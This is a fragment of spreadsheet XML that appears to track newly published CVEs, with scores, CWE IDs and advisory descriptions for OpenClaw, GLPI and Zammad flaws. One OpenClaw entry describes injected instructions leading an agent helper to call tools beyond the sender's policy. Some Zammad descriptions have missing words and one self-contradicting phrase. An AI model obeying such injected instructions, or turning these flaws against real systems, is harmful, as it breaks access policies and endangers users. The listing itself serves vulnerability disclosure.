        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100527</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr"/>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>OpenClaw before 2026.8.2 contains a denial of service vulnerability in the Browser extension relay that allows unauthenticated network sources to exhaust pending-authentication capacity. Attackers can hold every pending slot by maintaining silent WebSocket upgrades, preventing paired extensions from completing Browser Relay Authentication v2.</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100527</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100533</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="inlineStr"/>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a path traversal vulnerability in the tools.fs.workspaceOnly feature where Unicode filename fallback can normalize validated parent directory components. Admitted requesters can exploit canonically equivalent sibling directories to read files outside the configured workspace boundary.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100533</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100545</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr">
        <is>
          <t>npm, gin, rust</t>
        </is>
      </c>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.8.1 incorrectly enforces sender tool policies during session-memory filename generation. In affected versions, filename generation created an embedded helper that retained tools which the originating sender's policy had removed. When session-memory filename generation was enabled for an agent reachable by lower-trust senders, model-mediated instructions could cause the helper to invoke tools outside that sender's effective policy; the demonstrated impact was the creation of persistent scheduled work. Exploitability depends on the model acting on the injected instruction and on which tools the helper exposes. The issue is fixed in 2026.8.1; as a workaround, disable session-memory filename generation for agents reachable by lower-trust senders.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100545</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100548</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.3.28 and &lt; 2026.8.1 contain a credential exposure issue in memory embedding failover. When remote embedding fallback is configured and the primary embedding provider fails, the request can be sent to a different fallback provider while still reusing the primary provider's configured API key, causing that credential to be transmitted as a bearer token to an unintended vendor. The practical impact depends on the configured providers, whether failover occurs, and the privileges attached to the primary provider key. The issue is fixed in 2026.8.1; as a workaround, disable cross-provider embedding fallback or configure each provider with separate, narrowly scoped credentials.</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100548</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100571</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr">
        <is>
          <t>tempo, npm, requests, rust</t>
        </is>
      </c>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.6.6 and &lt; 2026.8.1 apply the SMS webhook invalid-request rate limit before Twilio signature verification and identify clients only by the raw proxy socket address. In deployments where the SMS/Twilio webhook sits behind a trusted reverse proxy or tunnel so that multiple external clients share one socket address, an unauthenticated remote sender can exhaust the shared pre-authentication rate-limit budget with invalid requests, causing subsequent correctly signed Twilio callbacks to receive HTTP 429 responses. The result is temporary inbound SMS loss while the shared window remains exhausted; the attacker cannot forge a callback or access message data. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100571</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100572</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>tempo, rust</t>
        </is>
      </c>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions &gt;= 2026.3.25 and &lt; 2026.8.1 apply invalid-token rate limiting for Synology Chat webhooks before authentication and key the limit on the raw proxy socket address. In deployments where OpenClaw sits behind a trusted reverse proxy or tunnel and multiple external clients share a single socket address, an unauthenticated sender can exhaust the shared invalid-token budget, causing subsequent legitimate Synology Chat webhook callbacks to be rejected until the rate-limit window expires. The attacker cannot obtain a valid token or read message data; the impact is temporary loss of channel availability. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100572</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45801</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 0.72 until 10.0.26 and 11.0.8, an authenticated user without the required permission can enable debug mode. The affected user-setting update does not enforce the privilege boundary intended to restrict debug-mode activation. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45801</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55217</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 0.85 until 10.0.26 and 11.0.8, a low-privileged authenticated user can create, update, or delete knowledge base comments and translations without the required authorization for the affected content. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55217</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56728</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-639</t>
        </is>
      </c>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, a broken access control vulnerability exists in Zammad's GraphQL API. An authenticated user can access taskbar item data belonging to another user by crafting a request with the target user's taskbar identifier. The taskbar feature stores transient state for active user sessions, including auto-saved ticket drafts. Under certain conditions, the authorization check for taskbar item access is not enforced, allowing a user to read another user's taskbar item data. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56728</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56732</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-352</t>
        </is>
      </c>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, vulnerability in Zammad's HTML sanitization allows injection of specific HTML elements into ticket bodies. When another user views the crafted ticket, the injected element can trigger a logout request, terminating the viewer's session. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56732</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56734</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr"/>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, during federated authentication (OAuth/OIDC/SAML), a profile image URL from the external identity provider is fetched without verifying the target address. An actor who controls their profile at a connected provider may cause the server to connect to internal network locations. Response timing and error patterns differ between reachable and unreachable targets, allowing internal service probing. Worker processes may be blocked for several seconds per request. Requires a configured external authentication provider where the actor can modify their profile image URL. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56734</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56735</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="inlineStr"/>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>CWE-82</t>
        </is>
      </c>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2 and 7.1.0, zammad's HTML sanitizer (HtmlSanitizer::Strict) blocks external URLs in  to prevent remote content loading, but the srcset attribute, also allowlisted for , is not subject to the same check. This oversight allows an attacker to embed arbitrary external URLs in the srcset attribute just by sending an e-mail, effectively bypassing the external content protection. When an agent views the ticket containing the malicious srcset, the browser will silently load the attacker-controlled URL, resulting in the leakage of the agent's IP address, User-Agent, Referer, and the exact time the ticket was viewed. HtmlSanitizer::Strict got extended to block external URLs in the srcset attribute of  tags. This was done to prevent tracking pixels and external content loading, which could compromise user privacy. This issue is fixed in versions 7.0.2 and 7.1.0.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56735</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61855</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="inlineStr"/>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. In 7.0.3 and 7.1.1, under certain conditions, Zammad's verification of inbound PGP-signed email can mark a message as carrying a valid ("Good") PGP signature from a registered sender key, even though the displayed message content is not actually covered by that signature. As a result, the inbound article may be stored with a successful signature status that does not reflect the authenticity of the shown content. This can mislead agents who rely on the signature indicator when assessing the trustworthiness of incoming mail. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61855</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63006</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, attacker-controlled HTML in inbound emails or tickets could bypass the image URL sanitizer using path traversal sequences. When an authenticated agent views the content, the browser resolves the URL to a protected API endpoint and sends the request with the agent's session cookie, enabling side effects such as forced logout without any user interaction. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63006</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63206</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-20</t>
        </is>
      </c>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, zammad's HTML sanitizer, which blocks remote images in ticket articles and email views, can be bypassed using a shortened URL format that omits the double slash after the scheme (for example a shortened HTTP URL instead of a shortened HTTP URL). Modern browsers treat both forms as equivalent remote URLs. As a result, an attacker who sends a crafted email or ticket can cause the recipient's browser to silently load an image from an external server, revealing when and by whom the ticket was opened. Zammad's "remote content blocked" warning is not shown because the sanitizer does not recognize the shortened form as remote. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63206</t>
        </is>
